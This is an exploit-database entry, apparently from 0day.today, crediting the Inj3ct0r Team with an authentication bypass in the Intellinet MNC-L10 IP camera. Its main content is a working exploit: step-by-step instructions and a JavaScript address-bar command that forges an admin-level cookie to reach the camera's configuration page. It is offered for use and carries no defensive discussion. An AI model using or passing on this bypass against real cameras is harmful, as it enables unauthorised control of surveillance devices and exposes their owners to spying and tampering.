id: 13543
date: 08/01/2010
title: Intellinet IP Camera MNC-L10 Authentication Bypass Vulnerability
author: Magnefikko
cves: 

================================================================
Intellinet IP Camera MNC-L10 Authentication Bypass Vulnerability
================================================================

Promhyl Studies :: http://promhyl.tk
Inj3ct0r Team :: http://inj3ct0r.com
Subgroup: #PRekambr
Name: Intellinet IP Camera Admin Access
Platform: Intellinet IP Camera MNC-L10 and other
 
 
...:: Exploit ::...
 
JS is required.
 
1. Go to http://cameraip/main_configure.cgi
2. Write in address bar:
--- code ---
javascript:document.cookie="user_auth_level=43";document.location=document.location
--- code ---
3. Push enter.
 
or add cookie with another method.
 
 
----== Promhyl Studies :: http://promhyl.tk ==----
----== Inj3ct0r Team :: http://inj3ct0r.com ==----



#  0day.today [2023-03-21]  #